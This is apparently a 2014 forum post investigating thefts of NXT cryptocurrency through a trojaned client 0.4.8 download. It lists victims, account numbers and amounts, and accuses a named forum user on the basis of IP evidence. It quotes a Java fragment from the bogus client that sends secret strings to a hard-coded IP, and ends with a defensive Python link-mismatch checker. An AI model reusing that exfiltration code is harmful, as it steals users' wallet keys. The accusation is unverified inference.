OK, a summary of what we know so far:
The smoking gun points to EpicThomas, and kudos to LiQio for finding the smoking gun.
Go to the Google cache page LiQio found below, then hover your mouse over the link where EpicThomas says "NRS 0.4.8 is ready and can be downloaded from: http://info.nxtcrypto.org/nxt-client-0.4.8.zip". The mouseover link that appears goes to http://162.243.246.233/nxt-client-0.4.8.zip even tho the blue text of the link says http://info.nxtcrypto.org/nxt-client-0.4.8.zip.
http://webcache.googleusercontent.com/search?q=cache:x1fHlORdUIEJ:https://bitcointalk.org/index.php%3Ftopic%3D345619.11820+&cd=1&hl=de&ct=clnk&gl=de
EpicThomas then later edited his post and CHANGED IT BACK to the correct client.
The 0.4.8 losses were first reported by Sparta_cuss (147K NXT), then PaulyC (8K), then newcn (18K), then plasticAiredale (19K). The 0.4.8 losses we do know of came in an 8-minute window:
Time                 Victim           Victim Account        Thief Account         NXT
01.01.2014 12:56:54  plasticAiredale  8439060069775407509   15182566201738727933  18665
01.01.2014 12:58:03  PaulyC           16821029889165561706  16204974692852323982  7808
01.01.2014 13:01:45  newcn            16886318053889080545  9793828175536096502   18197
01.01.2014 13:05:06  sparta_cuss      11794318797680953099  12152013998194592943  147690
There may well be more 0.4.8 losses that haven't been discovered or reported yet.
There may have been losses from earlier clients before 0.4.8, as first reported by Framewood on December 27, 2013, 06:26:16 PM. If so, here is the first reported loss:
Time                 Victim     Victim Account      Thief Account         NXT
26.12.2013 17:09:30  Framewood  697109629372813510  13643712185318669838  100088
Total reported losses so far are 292,448 NXT worth around 28 BTC or over $23,000.
There's got to be more. Keep digging.
More evidence. The IP address where the bogus client was stored belongs to EpicThomas, the same as epicdices.com.
Quote from: notsoshifty on Today at 01:46:08 AM
Quote from: notsoshifty on Today at 01:38:41 AM
Interesting...:
Code:
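// Fragment as posted; needs java.net.URL, java.net.URLConnection and java.net.URLEncoder.
if (!paramString.equals(""))
{
    // Only strings not already recorded in myKeys trigger a request.
    if (!myKeys.contains(paramString))
    {
        // paramString is URL-encoded and sent as the request path to a hard-coded IP on port 3000.
        URL url = new URL("http://162.243.246.223:3000/" + URLEncoder.encode(paramString, "ISO-8859-1"));
        URLConnection connection = url.openConnection();
        connection.setConnectTimeout(10000);
        // Opening the input stream is what actually issues the HTTP request.
        connection.getInputStream();
        myKeys.add(paramString);
    }
}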
epicdices.com is also hosted on 162.243.246.223 - coincidence?
No, as I wrote here, we know the identity of the hacker:
162.243.246.223 looks like it is "epicdices.com" (http://domain-kb.com/www/epicdices.com)
Owner of epicdices - EpicThomas - is a member of this topic:
https://bitcointalksearch.org/user/epicthomas-172850
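
The mismatch between a link's visible text and its real target, which the post above describes for the 0.4.8 download link, can be checked mechanically before anyone clicks. The following Python sketch is an added example, not part of the original thread; the function and class names and the SAMPLE markup are constructed for illustration, using only the two download URLs and the thread URL quoted in the post.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit

def host_of(value):  # lowercase hostname for an http(s) URL, else None
    try:
        parts = urlsplit(value.strip())
    except ValueError:
        return None
    if parts.scheme.lower() not in ("http", "https"):
        return None
    return (parts.hostname or "").rstrip(".") or None

class LinkMismatchFinder(HTMLParser):
    """Collects <a> elements whose visible text is a URL on a different host than href."""
    def __init__(self):
        super().__init__()
        self.findings, self._href, self._text = [], None, []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href, self._text = dict(attrs).get("href") or "", []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag != "a" or self._href is None:
            return
        shown = "".join(self._text).strip()
        shown_host, real_host = host_of(shown), host_of(self._href)
        if shown_host and real_host and shown_host != real_host:
            self.findings.append((shown, self._href))
        self._href = None

def find_mismatched_links(html):
    finder = LinkMismatchFinder()
    finder.feed(html)
    finder.close()
    return finder.findings

# Constructed sample: the first link mirrors the mismatch described in the post, the second is benign.
SAMPLE = (
    '<a href="http://162.243.246.233/nxt-client-0.4.8.zip">'
    'http://info.nxtcrypto.org/nxt-client-0.4.8.zip</a> '
    '<a href="https://bitcointalk.org/index.php?topic=345619.11820">thread</a>'
)

if __name__ == "__main__":
    print(find_mismatched_links(SAMPLE))
```

Links whose text is not itself a URL are ignored, so the check only fires when the displayed address and the actual target name different hosts.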